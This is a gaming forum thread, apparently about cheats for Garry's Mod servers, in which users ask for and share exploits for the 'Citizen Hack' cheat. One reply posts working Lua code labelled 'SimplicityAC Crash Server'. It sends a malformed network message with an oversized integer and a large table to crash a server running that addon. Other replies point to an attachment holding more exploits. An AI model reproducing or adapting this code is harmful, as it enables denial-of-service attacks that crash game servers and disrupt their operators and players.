Could someone provide a list of addons for which Citizen Hack has exploits?
I don't care for the exploits themselves, just the addon names.
found some
BigExploits["SimplicityAC Crash Server"] = {func =
function()
if pMenu.IsNetString("SimplicityAC_aysent") then
local tbl = {}
for i=1,1000 do
tbl[i] = i;
end
net.Start("SimplicityAC_aysent")
net.WriteUInt(1, 8)
net.WriteUInt(4294967295, 32)
net.WriteTable(tbl)
net.SendToServer()
end
end
Ctrl + f and type Exploit to find them and go down!
Link it's from April: *d1scord inside*
Originally Posted by suchisgood
found some
Ctrl + f and type Exploit to find them and go down!
Link it's from April: *d1scord inside*
The attachment contains d1scord server link inside, remove them and re-upload.
Originally Posted by T-800
The attachment contains d1scord server link inside, remove them and re-upload.